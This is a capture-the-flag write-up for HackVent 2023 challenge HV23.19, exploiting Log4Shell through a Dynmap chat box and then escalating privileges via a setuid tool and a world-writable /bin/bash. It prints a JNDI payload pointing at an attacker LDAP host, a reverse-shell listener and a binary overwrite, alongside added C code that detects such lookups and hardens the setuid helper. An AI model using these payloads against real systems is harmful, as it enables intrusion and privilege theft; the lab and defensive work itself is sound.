HackVent 2023 - [HV23.19] Santa's Minecraft Server

Posted on Jan 1, 2024

Difficulty: Hard

Categories: Linux, Penetration Testing

Author: nichtseb

Santa likes to play minecraft. His favorite version is 1.16. For security reasons, the server is not publicly accessible. But Santa is a little show-off, so he has an online map to brag about his fabulous building skills.

We get access to a Dynmap web interface. The mentioned Minecraft version 1.16 is vulnerable to the Log4j exploit (Log4Shell), since whatever is typed into the chat ends up in the server log.

Dynmap has a chat box that we can use to trigger the Log4j vulnerability, using this PoC.

We can run the PoC using python3 poc.py --userip 10.13.0.xx --webport 8000 --lport 9001 and also start a netcat listener using nc -lvp 9001.

The PoC outputs a payload that we can use:

[+] Send me: ${jndi:ldap://10.13.0.xx:1389/a}

After entering this in the chat box, we get a reverse shell connection. First, we stabilize the shell:

/usr/bin/script -qc /bin/bash /dev/null
^Z
stty raw -echo; fg
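From the defending side, the message typed into the chat box is exactly what a server-side chat filter or log monitor can catch. The following C program is an added example; it is neither part of this writeup nor of Dynmap or the PoC. It classifies chat lines by whether they contain a "${jndi:" lookup in any letter case, or a nested "${...${...}...}" lookup, which ordinary chat never contains. The function names and the sample chat lines are constructed for the example (the second sample is the payload shown above).

```c
#include <ctype.h>
#include <stdio.h>

/* Case-insensitive check that `s` begins with `prefix`. */
static int starts_with_ci(const char *s, const char *prefix) {
    for (; *prefix != '\0'; s++, prefix++) {
        if (tolower((unsigned char)*s) != tolower((unsigned char)*prefix))
            return 0;
    }
    return 1;
}

/* Returns 1 if the text contains a "${jndi:" lookup (any letter case), the
 * form Log4j 2 expands into a remote JNDI request. */
int has_jndi_lookup(const char *s) {
    for (const char *p = s; *p != '\0'; p++) {
        if (p[0] == '$' && p[1] == '{' && starts_with_ci(p + 2, "jndi:"))
            return 1;
    }
    return 0;
}

/* Returns 1 if a "${" opens while another "${...}" is still open. Chat text
 * has no reason to nest lookups, so a monitor can treat it as hostile. */
int has_nested_lookup(const char *s) {
    int depth = 0;
    for (const char *p = s; *p != '\0'; p++) {
        if (p[0] == '$' && p[1] == '{') {
            if (++depth > 1) return 1;
            p++;                      /* skip the '{' */
        } else if (*p == '}' && depth > 0) {
            depth--;
        }
    }
    return 0;
}

/* 0 = clean, 1 = explicit jndi lookup, 2 = nested lookup. */
int classify_chat_line(const char *line) {
    if (has_jndi_lookup(line)) return 1;
    if (has_nested_lookup(line)) return 2;
    return 0;
}

int main(void) {
    /* Constructed sample chat lines in "<player> message" form; the second
     * one is the payload the PoC printed. */
    const char *samples[] = {
        "<santa> merry christmas everyone",
        "<guest> ${jndi:ldap://10.13.0.xx:1389/a}",
        "<guest> ${${a}b}",
        "<elf> price is ${5} per block"   /* a lone lookup that is not jndi */
    };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%d  %s\n", classify_chat_line(samples[i]), samples[i]);
    return 0;
}
```

Classes 1 and 2 are worth an alert; the fourth sample shows that a plain "${...}" is left alone, and a stricter server policy can simply reject any "${" in chat text. Either way this is only a stopgap: the structural fix is the one the flag hints at, updating Log4j so message lookups are no longer expanded.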

We can't read the flag under /home/santa/flag.txt, so we'll probably have to escalate privileges. There is a /santas-workshop directory with a tool binary that has the setuid bit set for the santa user. The source code of the tool binary is also there:

#include <unistd.h>
#include <stdio.h>

void debugShell() {
	printf("Launching debug shell...\n");
	/* runs /bin/bash with the binary's effective uid (santa) still in place */
	char *argv[] = { "/bin/bash", 0 };
	execve(argv[0], &argv[0], NULL);
}

void main() {
	printf("--- Santas Workshop Tool ---\n");
	printf("Pick an action:\n");
	printf("s) debug shell\n");
	printf("-- more options to come\n");

	char option;
	scanf("%c", &option);

	switch (option) {
	case 's': debugShell(); break;
	default: printf("Unknonwn option!\n"); break;
	}
}

Bash usually drops the setuid privileges (when its effective uid differs from the real uid, it resets the effective uid unless started with -p); we could circumvent that with suidbash (which was the intended solution). However, I noticed that /bin/bash is world-writable, so I just compiled my own binary and overwrote it:

cat > /tmp/shell.c
#define _GNU_SOURCE
#include <stdlib.h>
#include <unistd.h>

int main(void) {
	/* the tool runs with effective uid santa (1000); make it the real and saved uid too */
	setresuid(1000, 1000, 1000);
	system("cat /home/santa/flag.txt");
	return 0;
}
gcc -o /tmp/shell /tmp/shell.c
cat /tmp/shell > /bin/bash
/santas-workshop/tool
--- Santas Workshop Tool ---
Pick an action:
s) debug shell
-- more options to come
s
Launching debug shell...
HV23{d0n7_f0rg37_70_upd473_k1d5}
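Two things made this escalation work: the setuid tool hands out a shell without giving up its effective uid, and the binary it executes is world-writable. The following C program is an added example and not the challenge's code; it shows the hardened counterpart of debugShell() together with the two checks that would have blocked both paths. The function names (drop_privileges_to, is_safe_executable, launch_debug_shell, demo_writable_check) and the scratch file under /tmp are constructed for the example.

```c
#define _GNU_SOURCE            /* setresuid/getresuid are GNU extensions in glibc */
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

#ifndef __USE_GNU
/* Explicit prototypes so the example also builds when a system header was
 * already included before _GNU_SOURCE took effect. */
int setresuid(uid_t ruid, uid_t euid, uid_t suid);
int getresuid(uid_t *ruid, uid_t *euid, uid_t *suid);
#endif

/* Permanently set real, effective and saved uid to `target` and verify with
 * getresuid() that all three really changed. Changing only the effective uid
 * would leave the saved uid behind, which is exactly what lets a setuid
 * process regain its privileges later. Returns 0 on success, -1 on failure. */
int drop_privileges_to(uid_t target) {
    uid_t r, e, s;
    if (setresuid(target, target, target) != 0) return -1;
    if (getresuid(&r, &e, &s) != 0) return -1;
    return (r == target && e == target && s == target) ? 0 : -1;
}

/* Returns 1 if `path` is a regular file owned by `trusted_owner` that neither
 * group nor others can write; 0 otherwise. A world-writable /bin/bash, as in
 * the challenge, fails this check. */
int is_safe_executable(const char *path, uid_t trusted_owner) {
    struct stat st;
    if (stat(path, &st) != 0) return 0;
    if (!S_ISREG(st.st_mode)) return 0;
    if (st.st_uid != trusted_owner) return 0;
    if (st.st_mode & (S_IWGRP | S_IWOTH)) return 0;
    return 1;
}

/* Hardened counterpart of debugShell(): verify the binary, drop to the
 * caller's real uid, and only then execve. Returns -1 if anything fails. */
int launch_debug_shell(const char *shell_path) {
    if (!is_safe_executable(shell_path, 0)) {
        fprintf(stderr, "refusing %s: not a root-owned, non-writable file\n", shell_path);
        return -1;
    }
    if (drop_privileges_to(getuid()) != 0) {
        fprintf(stderr, "could not drop privileges\n");
        return -1;
    }
    char *argv[] = { (char *)shell_path, NULL };
    execve(shell_path, argv, NULL);
    perror("execve");
    return -1;
}

/* Constructed self-check: a scratch file is rejected while world-writable and
 * accepted once its mode is 0755. Returns 1 if both observations match. */
int demo_writable_check(void) {
    char path[] = "/tmp/hv23-tool-XXXXXX";
    int fd = mkstemp(path);
    if (fd < 0) return 0;
    int ok = 1;
    if (fchmod(fd, 0666) != 0 || is_safe_executable(path, getuid()) != 0) ok = 0;
    if (fchmod(fd, 0755) != 0 || is_safe_executable(path, getuid()) != 1) ok = 0;
    close(fd);
    unlink(path);
    return ok;
}

int main(void) {
    printf("writable-file check behaves as expected: %s\n",
           demo_writable_check() ? "yes" : "no");
    printf("privileges dropped to uid %u: %s\n", (unsigned)getuid(),
           drop_privileges_to(getuid()) == 0 ? "yes" : "no");
    return 0;
}
```

With these checks in place, the tool would have refused the world-writable /bin/bash, and even a genuine shell would have started as the calling user, so neither suidbash nor the overwritten binary would have yielded santa's flag. The broader lesson for the host is the same as for the Log4j step: a setuid helper must never spawn an interactive shell with its elevated uid, and file permissions on system binaries belong in a regular integrity check.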